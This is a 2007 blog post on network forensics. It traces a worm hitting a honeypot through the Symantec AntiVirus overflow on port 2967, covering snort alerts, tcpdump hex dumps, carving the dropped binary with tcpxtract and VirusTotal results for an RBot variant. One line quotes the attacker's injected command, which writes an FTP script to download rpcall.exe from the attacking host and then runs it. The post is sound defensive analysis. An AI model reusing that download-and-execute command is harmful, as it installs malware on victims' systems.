Tuesday, December 04, 2007

x4D x5A ......x50 x45


In this post I am going to demonstrate the analysis process after discovering a successful download on my honeypot.

Checking my IDS logs, I noticed a PE executable download rule fire:

> ./snortalog.pl /nsm/snort/alert -3 -attack -fday 13

subject: IDS Statistics generated on Tue Nov 13 08:45:55 2007

The log begins at : Nov 13 00:00:16

The log ends at : Nov 13 08:46:11

Total of Lines in log file : 155255

Total of Logs Dropped : 35028 (22.56%)

Filter Running: day = 13

Total events in table : 27973

Source IP recorded : 17

Destination IP recorded : 10

Host logger recorded : 1 with 1 interface(s)

Signatures recorded : 22

Classification recorded : 9

Severity recorded : 4

Portscan detected : 0

Distribution of attack methods

=============================================================================================================

### 22 of 22 ###

% No Attack Priority Severity

=============================================================================================================

……

0.02 5 EXPLOIT symantec antivirus realtime virusscan overflow attempt {tcp} 1 high

0.01 4 SHELLCODE x86 inc ebx NOOP {tcp} 1 high

0.01 2 MS-SQL Worm propagation attempt {udp} 2 medium

0.01 2 SHELLCODE x86 NOOP {tcp} 1 high

0.01 2 BLEEDING-EDGE POLICY Google IM traffic Jabber client sign-on {tcp} 1 high

0.01 2 DNS SPOOF query response with TTL of 1 min. and no authority {udp} 2 medium

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 HTTP Proxy Inbound Request (Linux Source) {tcp} 3 low

0.00 1 BLEEDING-EDGE POLICY RDP connection request {tcp} 3 low

0.00 1 MISC MS Terminal server request {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 HTTP Proxy Inbound Request (Windows Source) {tcp} 3 low

0.00 1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY {tcp} 3 unknown

0.00 1 BLEEDING-EDGE PE EXE or DLL Windows file download {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 Inbound Connect Request (Linux Source) {tcp} 3 low

0.00 1 BLEEDING-EDGE POLICY RDP connection confirm {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 Inbound Connect Request (Windows Source) {tcp} 3 low

Version: 2.4.2

Jeremy CHARTIER,

Date: 04/02/2007 14:52:11

Checking the src_dst option in snortalog we notice the source IP, and more we see two alerts for the same IP:

> ./snortalog.pl /nsm/snort/alert -3 -src_dst_attack -fday 13

........

0.00 1 71.40.196.103 192.168.0.34 EXPLOIT symantec antivirus realtime virusscan overflow attempt {tcp}

0.00 1 71.40.196.103 192.168.0.34 BLEEDING-EDGE PE EXE or DLL Windows file download {tcp}


Going to snort alert packet data, we get the story.

# tcpdump -vvnnXs 1514 -r snort.log.1194918671 host 71.40.196.103

reading from file snort.log.1194918671, link-type EN10MB (Ethernet)

00:31:39.629624 IP (tos 0x0, ttl 46, id 11982, offset 0, flags [DF], proto: TCP (6), length: 1492) 71.40.196.103.52569 > 192.168.0.34.2967: ., cksum 0xaaef (correct), 3854001018:3854002470(1452) ack 3652677825 win 64240

0x0000: 4500 05d4 2ece 4000 2e06 4bfc 4728 c467 E.....@...K.G(.g

0x0010: c0a8 0022 cd59 0b97 e5b7 637a d9b7 70c1 ...".Y....cz..p.

0x0020: 5010 faf0 aaef 0000 0110 0f20 0a00 0000 P...............

0x0030: 0218 0001 0000 0000 0024 0014 b7c9 d2d9 .........$......

0x0040: 3e33 ef34 251f 4300 0202 5c2f 6161 6161 >3.4%.C...\/aaaa

0x0050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0080: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0090: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00b0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00c0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00d0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00e0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00f0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0100: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0110: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0120: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0130: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0140: 6161 6161 6161 6161 6161 6162 6262 6262 aaaaaaaaaaabbbbb

.......

00:31:42.622794 IP (tos 0x0, ttl 46, id 12544, offset 0, flags [DF], proto: TCP (6), length: 1492) 71.40.196.103.52964 > 192.168.0.34.65535: ., cksum 0x11e7 (correct), 3870755453:3870756905(1452) ack 3658573020 win 64240

0x0000: 4500 05d4 3100 4000 2e06 49ca 4728 c467 E...1.@...I.G(.g

0x0010: c0a8 0022 cee4 ffff e6b7 0a7d da11 64dc ...".......}..d.

0x0020: 5010 faf0 11e7 0000 4d5a 9000 0300 0000 P.......MZ......

0x0030: 0400 0000 ffff 0000 b800 0000 0000 0000 ................

0x0040: 4000 0000 0000 0000 0000 0000 0000 0000 @...............

0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................

0x0060: 0000 0000 c000 0000 0e1f ba0e 00b4 09cd ................

0x0070: 21b8 014c cd21 5468 6973 2070 726f 6772 !..L.!This.progr

0x0080: 616d 2063 616e 6e6f 7420 6265 2072 756e am.cannot.be.run

0x0090: 2069 6e20 444f 5320 6d6f 6465 2e0d 0d0a .in.DOS.mode....

0x00a0: 2400 0000 0000 0000 0e16 3dd2 4a77 5381 $.........=.JwS.

0x00b0: 4a77 5381 4a77 5381 4a77 5381 4e77 5381 JwS.JwS.JwS.NwS.

0x00c0: c468 4081 5e77 5381 b657 4181 4b77 5381 .h@.^wS..WA.KwS.

0x00d0: 5269 6368 4a77 5381 0000 0000 0000 0000 RichJwS.........

0x00e0: 0000 0000 0000 0000 5045 0000 4c01 0200 ........PE..L...

0x00f0: 08b3 f445 0000 0000 0000 0000 e000 0f01 ...E............

0x0100: 0b01 050c 000a 0000 72f7 0100 0000 0000 ........r.......

0x0110: 0010 0000 0010 0000 0020 0000 0000 0010 ................

.........

We know the port 2967 all to well, SAV overflow and EXE download. From here we see a valid download of a binary marked by the “MZ” DOS stub and “PE” file headers.

Had this been a real host and not a honeypot, we could conclude that this host was successfully exploited by the worm payload which caused shellcode to execute on the system to download the worm body. This host would need to be examined further.

From here we can extract the binary from full content data using tcpXtract.

# tcpdump -r shark_00001_20071112193138 -w dump host 71.40.196.103

and ….

# tcpxtract -f dump

Found file of type "exe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000000.exe

Found file of type "pe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000001.pe

Found file of type "exe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000002.exe

reading from file shark_00001_20071112193138, link-type EN10MB (Ethernet)

It is important to note that these files extracted are most likely the same file as tcpxtract is looking to dump looking for the “MZ” or “PE” strings. Using our knowledge of the PE file format we can determine that the only valid executable is the “00000000.exe” file.

A look with tcpflow gives us the name of the binary and the injected ftp command:

071.040.196.103.52580-192.168.000.034.08555: cmd /c echo open 71.40.196.103 19090 >> ii &echo user 1 1 >> ii &echo get rpcall.exe >> ii &echo bye >> ii &ftp-n -v -s:ii &del ii &rpcall.exe

Now that the executable is fully extracted, we can move to our reverse engineering (RE) platform, usually a Windows box running IDA Pro and Ollydbg.

First thing I like to do is pass the binary through PEiD:

PEiD detected that it is packed with PECompact 2.x. This helps us to determine the packer used and aids in unpacking the malware.

Next I run the malware through VirusTotal to see if it is a known variant. The results show that this is not a highly detected piece of malware. Only a few of the AV solutions detected it.

AntiVir 7.6.0.34 2007.11.25 HEUR/Crypted

AVG 7.5.0.503 2007.11.25 BackDoor.RBot.AN

eSafe 7.0.15.0 2007.11.21 Suspicious File

McAfee 5170 2007.11.23 W32/Sdbot.worm.gen.as

Panda 9.0.0.4 2007.11.25 Suspicious file

Prevx1 V2 2007.11.25 Heuristic: Suspicious Self Modifying EXE

Sunbelt 2.2.907.0 2007.11.24 VIPRE.Suspicious

Webwasher-Gateway 6.0.1 2007.11.25 Heuristic.Crypted

In my next post I will demonstrate some reverse engineering, and dynamic analysis tricks to analyze this specimen.

1 comment:

C.S.Lee said...

hi,

I have written some of the tcpxtract tips and tricks here -

http://geek00l.blogspot.com/search?q=tcpxtract

We have also released the HeX liveCD which contains 10 extra signatures for tcpxtract plus other good stuffs.

Nice write up, learn about your blog from taosecurity.

Cheers ;]